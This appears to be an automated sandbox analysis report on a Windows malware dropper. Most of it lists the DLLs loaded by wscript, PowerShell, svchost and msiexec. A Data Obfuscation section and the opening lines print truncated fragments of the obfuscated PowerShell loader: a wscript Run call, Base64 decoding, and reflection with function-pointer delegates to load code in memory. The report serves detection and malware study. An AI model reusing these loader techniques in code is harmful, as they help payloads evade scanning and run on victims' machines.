parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.Core.pdb{ source: powershell.exe, 0000000E.00000002.1696135533.0000000008C32000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1696135533.0000000008C10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: (non)Standard Marshaling for IWbemObjectSinkEx.pdb source: powershell.exe, 00000004.00000002.1380327137.00000225FA249000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($", "0")
              Source: Yara matchFile source: 0000000E.00000002.1697979779.000000000AC0F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1697743441.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1680502700.0000000005F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Lyskopis)$GlOBaL:TetrAPHOSphAtE = [system.TEXt.eNCODiNG]::ascII.GeTStrinG($GordIoId)$GlObAL:PauLiNIaN52=$tETraPhosPHATE.SUBSTRiNg($poLLsteR,$bARYTOCeLestITE)<#Opgavesttet Maudlinise
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Deamidization $Convictor145 $Ytringsfriheder), (overladt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fugtpletternes = [AppDomain]::CurrentDomain.GetAss
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Refederalizing)), $Gynecomazia105).DefineDynamicModule($Complaisantness, $false).DefineType($Slibrig139, $Skraabjlkes, [System.Multica
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Lyskopis)$GlOBaL:TetrAPHOSphAtE = [system.TEXt.eNCODiNG]::ascII.GeTStrinG($GordIoId)$GlObAL:PauLiNIaN52=$tETraPhosPHATE.SUBSTRiNg($poLLsteR,$bARYTOCeLestITE)<#Opgavesttet Maudlinise
